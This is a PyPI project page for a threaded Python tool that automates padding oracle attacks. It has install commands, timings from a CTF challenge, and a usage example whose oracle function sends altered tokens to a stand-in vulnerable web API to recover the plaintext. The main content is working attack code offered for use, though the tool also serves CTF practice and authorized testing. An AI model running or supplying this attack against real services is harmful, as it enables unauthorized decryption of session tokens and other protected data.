Threaded padding oracle automation.
Project description
padding_oracle.py
Fast threaded padding oracle attack automation script for Python 3.
Install
PyPI:
pip3 install -U padding_oracle
GitHub:
pip3 install -U git+https://github.com/djosix/padding_oracle.py.git
Performance
Tested on [0x09] Cathub Party from EDU-CTF:
Request Threads | Execution Time |
---|---|
1 | 17m 43s |
4 | 5m 23s |
16 | 1m 20s |
64 | 56s |
Usage
E.g. testing https://vulnerable.website/api/?token=M9I2K9mZxzRUvyMkFRebeQzrCaMta83eAE72lMxzg94%3D
:
from padding_oracle import padding_oracle, base64_encode, base64_decode
import requests
sess = requests.Session() # use connection pool
url = 'https://vulnerable.website/api/'
def oracle(ciphertext: bytes):
resp = sess.get(url, params={'token': base64_encode(ciphertext)})
if 'failed' in resp.text:
return False # e.g. token decryption failed
elif 'success' in resp.text:
return True
else:
raise RuntimeError('unexpected behavior')
ciphertext: bytes = base64_decode('M9I2K9mZxzRUvyMkFRebeQzrCaMta83eAE72lMxzg94=')
# len(ciphertext) is 32
# possibly be "IV + cipher block" if block size is 16
assert len(ciphertext) % 16 == 0
plaintext = padding_oracle(
ciphertext,
block_size = 16,
oracle = oracle,
num_threads = 16,
)
This package also provides PHP-like encoding/decoding functions:
from padding_oracle.encoding import (
urlencode,
urldecode,
base64_encode,
base64_decode,
)
License
This project is licensed under the terms of the MIT license.
Project details
Download files
Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
Source Distribution
padding_oracle-0.3.2.tar.gz
(8.2 MB
view hashes)
Built Distribution
Close
Hashes for padding_oracle-0.3.2-py3-none-any.whl
Algorithm | Hash digest | |
---|---|---|
SHA256 | 98b8ee1ed2147acf910a751d1296491080ac893885af25ef4063639640aa980d |
|
MD5 | 60d1cbe2c27b4d2814e602d76b077f00 |
|
BLAKE2b-256 | 59b50feee70e1bcbfacd91de0a86f8873e21b1f53ff08ec807593084b59a46f0 |